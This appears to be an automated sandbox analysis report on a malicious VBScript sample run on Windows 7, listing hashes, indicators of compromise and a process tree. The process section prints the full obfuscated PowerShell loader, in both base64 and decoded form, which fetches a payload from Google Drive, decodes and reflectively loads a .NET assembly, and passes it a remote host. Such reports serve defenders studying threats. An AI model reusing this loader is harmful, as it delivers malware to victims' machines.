Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
06-11-2024 02:16
Static task
static1
Behavioral task
behavioral1
Sample
270028765f570ebbb238ee6fb9460d1a674707016d97fc988f772195516ad3ff.vbs
Resource
win7-20240903-en
General
-
Target
270028765f570ebbb238ee6fb9460d1a674707016d97fc988f772195516ad3ff.vbs
-
Size
140KB
-
MD5
cbcf626e71d764c178148e4637e333af
-
SHA1
c3e2615fea0051e63e817c7ad9cc17b59d6da776
-
SHA256
270028765f570ebbb238ee6fb9460d1a674707016d97fc988f772195516ad3ff
-
SHA512
da100c32335caf638e6ccdb0ec37c6e0c6596dfc98b09ef7c39c20911ddadc4576adb67e58187a008be6183bf7cfe89646558bb9abed10374d9e9c5902111fb3
-
SSDEEP
3072:ky7jgt5pEGwprytIsaK18meFZjcrsmiYADap1Ff:KRQjcQmiMp1Ff
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2688 powershell.exe 7 2688 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2664 powershell.exe 2688 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 4 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2664 powershell.exe 2688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 2688 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 628 wrote to memory of 2664 628 WScript.exe 31 PID 628 wrote to memory of 2664 628 WScript.exe 31 PID 628 wrote to memory of 2664 628 WScript.exe 31 PID 2664 wrote to memory of 2688 2664 powershell.exe 33 PID 2664 wrote to memory of 2688 2664 powershell.exe 33 PID 2664 wrote to memory of 2688 2664 powershell.exe 33
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\270028765f570ebbb238ee6fb9460d1a674707016d97fc988f772195516ad3ff.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdWICcqbURyKicpLm5hbUVbMywxMSwyXS1KT2luJycpKCgnZHZ1aW1hJysnZ2VVcmwgPSBGZ2EnKydodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFVeUhxd3JuWENsS0JKM2o2M0xsMXQyU3RWZ0d4YlN0MCBGZ2E7ZHZ1d2ViQ2xpZW4nKyd0ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtkdnVpbWFnZUJ5dGVzID0gZHZ1d2ViQ2xpZW50LkQnKydvd25sb2FkRGF0YShkdnVpbWFnZVVybCknKyc7JysnZHZ1JysnaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC4nKydHZXRTJysndHJpbmcoZHZ1aW1hZ2VCeXRlJysncyk7ZHZ1c3RhcnRGbGFnID0gRmdhPDxCQVNFNjRfU1RBUlQnKyc+PkZnYTtkdnVlbmRGbGFnID0gRmdhPDxCQVNFNjRfRU5EPj5GZ2E7ZHZ1c3RhcnRJbmRleCA9IGR2dWltYWdlVGV4dC5JbmRleE9mKGR2dXN0YXJ0RmxhZyk7ZHZ1ZW5kSW5kZXggPSBkdnVpbWFnZVRleHQuSW5kZXhPZihkdnVlbmRGbGEnKydnKTtkdnVzdGFydEluZGV4IC1nZSAwIC1hbmQgZHZ1ZW5kSW5kZXggLWd0IGR2dXN0YXJ0SW5kZXg7ZHZ1c3RhcnRJbmRleCArPSBkdnVzdGFydEZsYWcuTCcrJ2VuZ3RoO2R2dWJhc2U2NExlbmd0aCA9IGR2dWVuZEluZGV4IC0gZHZ1c3RhcnRJbmRleDtkdnViYXNlNjRDb21tYW5kID0gZHZ1aW1hZ2VUZXh0LlN1YnN0cmluZyhkdnVzdGFydEluZGV4LCBkdnUnKydiYXNlNjRMZW5ndGgpO2R2dWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGR2dWJhc2U2NENvbW1hbmQuVG9DaGFyQXInKydyYXkoKSBiSFogRm9yRWFjaC1PYmplY3QgeyBkdnVfIH0pWy0xLi4tKGR2dWJhcycrJ2U2NENvbW1hbmQuTGVuZ3RoKV07ZHZ1Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhkdnViYXNlNjRSZXZlcnNlZCk7ZHZ1bG9hZGVkQXNzZScrJ21ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGR2dWNvbW1hbmRCeXRlcyk7ZHZ1dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChGZ2FWQUlGZ2EpO2R2dXZhaU1ldGhvZC5JbnZva2UoZHZ1bnVsbCwgQChGZ2F0eHQub29vb2RlZXZ2di8zODEuMTQyLjk0MS41NC8vOnB0dGhGZ2EsIEZnYScrJ2Rlc2F0aXZhZG9GZ2EsIEZnYWRlc2F0aXZhZG9GZ2EsIEZnYWRlc2F0aXZhZG9GZ2EsIEZnYU1TQnVpbGRGZ2EsICcrJ0ZnYWRlc2F0aXZhZG9GZ2EsIEZnYWRlc2F0aScrJ3ZhZG9GZ2EsRmdhZGVzYXRpJysndmFkb0ZnYSxGJysnZycrJ2FkZXNhdGl2YScrJ2RvRmdhLEZnYWRlc2F0aXZhZG9GZ2EsRmdhZGVzYXRpdmFkb0ZnYSxGZ2FkZXNhdGl2YWRvRmdhLEZnYTFGZ2EsRmdhZGVzYXRpdmFkb0ZnYSkpOycpLnJlcGxBY0UoJ2JIWicsJ3wnKS5yZXBsQWNFKChbY2hhcl0xMDArW2NoYXJdMTE4K1tjaGFyXTExNyksJyQnKS5yZXBsQWNFKCdGZ2EnLFtzdHJpbmddW2NoYXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((gV '*mDr*').namE[3,11,2]-JOin'')(('dvuima'+'geUrl = Fga'+'https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 Fga;dvuwebClien'+'t = New-Object System.Net.WebClient;dvuimageBytes = dvuwebClient.D'+'ownloadData(dvuimageUrl)'+';'+'dvu'+'imageText = [System.Text.Encoding]::UTF8.'+'GetS'+'tring(dvuimageByte'+'s);dvustartFlag = Fga<<BASE64_START'+'>>Fga;dvuendFlag = Fga<<BASE64_END>>Fga;dvustartIndex = dvuimageText.IndexOf(dvustartFlag);dvuendIndex = dvuimageText.IndexOf(dvuendFla'+'g);dvustartIndex -ge 0 -and dvuendIndex -gt dvustartIndex;dvustartIndex += dvustartFlag.L'+'ength;dvubase64Length = dvuendIndex - dvustartIndex;dvubase64Command = dvuimageText.Substring(dvustartIndex, dvu'+'base64Length);dvubase64Reversed = -join (dvubase64Command.ToCharAr'+'ray() bHZ ForEach-Object { dvu_ })[-1..-(dvubas'+'e64Command.Length)];dvucommandByt'+'es = [System.Convert]::FromBase64String(dvubase64Reversed);dvuloadedAsse'+'mbly = [System.Reflection.Assembly]::Load(dvucommandBytes);dvuvaiMethod = [dnlib.IO.Home].GetMethod(FgaVAIFga);dvuvaiMethod.Invoke(dvunull, @(Fgatxt.oooodeevvv/381.142.941.54//:ptthFga, Fga'+'desativadoFga, FgadesativadoFga, FgadesativadoFga, FgaMSBuildFga, '+'FgadesativadoFga, Fgadesati'+'vadoFga,Fgadesati'+'vadoFga,F'+'g'+'adesativa'+'doFga,FgadesativadoFga,FgadesativadoFga,FgadesativadoFga,Fga1Fga,FgadesativadoFga));').replAcE('bHZ','|').replAcE(([char]100+[char]118+[char]117),'$').replAcE('Fga',[string][char]39) )"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51e2a161c0f561ed2203faf0dcf1395dc
SHA14b4811e31ed88ffc1480780e141e92ff481f21fc
SHA2562395e394669cc1822814f53529ae3b68a09b7f438a053e7be85f5314bad667bc
SHA512ed72dd9d520be773724fee439f6834215e4a8ad6cfaef3a93a5ecf1ad8513a87874370516867596f658ab938c18136fd008948fd9bbf32b7426677d5a3499133